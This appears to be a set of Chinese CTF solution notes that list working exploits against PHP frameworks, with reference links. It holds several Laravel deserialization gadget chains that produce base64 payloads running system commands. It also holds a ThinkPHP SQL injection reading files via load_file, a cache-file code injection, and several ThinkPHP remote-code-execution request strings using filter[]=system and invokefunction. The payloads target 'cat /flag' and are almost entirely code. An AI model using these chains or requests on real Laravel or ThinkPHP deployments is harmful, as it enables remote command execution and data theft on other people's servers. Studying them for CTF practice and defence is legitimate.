反序列化格式 /admin/序列化串base64
参考文章
https://xz.aliyun.com/t/11002
payload
namespace Illuminate\Validation {
class Validator {
public $extensions = [];
public function __construct() {
$this->extensions = ['' => 'system'];
}
}
}
namespace Illuminate\Broadcasting {
use Illuminate\Validation\Validator;
class PendingBroadcast {
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Validator();
$this->event = $cmd;
}
}
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>
参考文章https://xz.aliyun.com/t/9478
namespace Illuminate\Broadcasting
{
use Illuminate\Events\Dispatcher;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
}
}
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
namespace Illuminate\Events
{
class Dispatcher
{
protected $listeners;
public function __construct($event){
$this->listeners=[$event=>['system']];
}
}
}
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
namespace Illuminate\Broadcasting
{
use Illuminate\Notifications\ChannelManager;
class PendingBroadcast
{
protected $events;
public function __construct($cmd)
{
$this->events = new ChannelManager($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
echo base64_encode(serialize($seri));
}
namespace Illuminate\Notifications
{
class ChannelManager
{
protected $app;
protected $defaultChannel;
protected $customCreators;
public function __construct($cmd)
{
$this->defaultChannel = 'yu22x';
$this->customCreators = array('yu22x' => 'system');
$this->app = $cmd;
}
}
}
?>
发送payload后看下源代码即可。
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
namespace Illuminate\Broadcasting
{
use Faker\ValidGenerator;
class PendingBroadcast
{
protected $events;
public function __construct($cmd)
{
$this->events = new ValidGenerator($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
echo base64_encode(serialize($seri));
}
namespace Faker
{
use Faker\DefaultGenerator;
class ValidGenerator
{
protected $maxRetries;
protected $validator;
protected $generator;
public function __construct($cmd)
{
$this->generator = new DefaultGenerator($cmd);
$this->maxRetries = 10000000;
$this->validator = 'system';
}
}
}
namespace Faker
{
class DefaultGenerator
{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
}
?>
参考文章http://www.136.la/jingpin/show-180114.html#POC1_46
namespace Illuminate\Broadcasting
{
use Illuminate\Bus\Dispatcher;
use Illuminate\Foundation\Console\QueuedCommand;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct()
{
$this->events = new Dispatcher();
$this->event = new QueuedCommand();
}
}
}
namespace Illuminate\Foundation\Console
{
class QueuedCommand
{
public $connection = 'cat /flag';
}
}
namespace Illuminate\Bus
{
class Dispatcher
{
protected $queueResolver;
public function __construct()
{
$this->queueResolver='system';
}
}
}
namespace
{
use Illuminate\Broadcasting\PendingBroadcast;
echo base64_encode(serialize(new PendingBroadcast()));
}
参考文章https://blog.csdn.net/qq_38154820/article/details/114610513
payload
namespace Illuminate\Broadcasting{
use Illuminate\Contracts\Events\Dispatcher;
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace{
$c = new Illuminate\Broadcasting\BroadcastEvent('cat /flag');
$a = new Illuminate\Bus\Dispatcher('system');
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo base64_encode(serialize($b));
}
参考文章https://www.cnblogs.com/litlife/p/11273652.html
试了几个报错函数 ,其中exp可用。
payload
index.php?s=index/index/inject&a[0]=inc&a[1]=exp(~(select load_file('/flag')))&a[2]=1
参考文章https://blog.csdn.net/rfrder/article/details/114599310
public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//
接着访问
runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php
s=cat /flag&_method=__construct&method=POST&filter[]=system
aaaa=cat /flag&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=cat /flag
c=cat /flag&f=calc&_method=filter
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*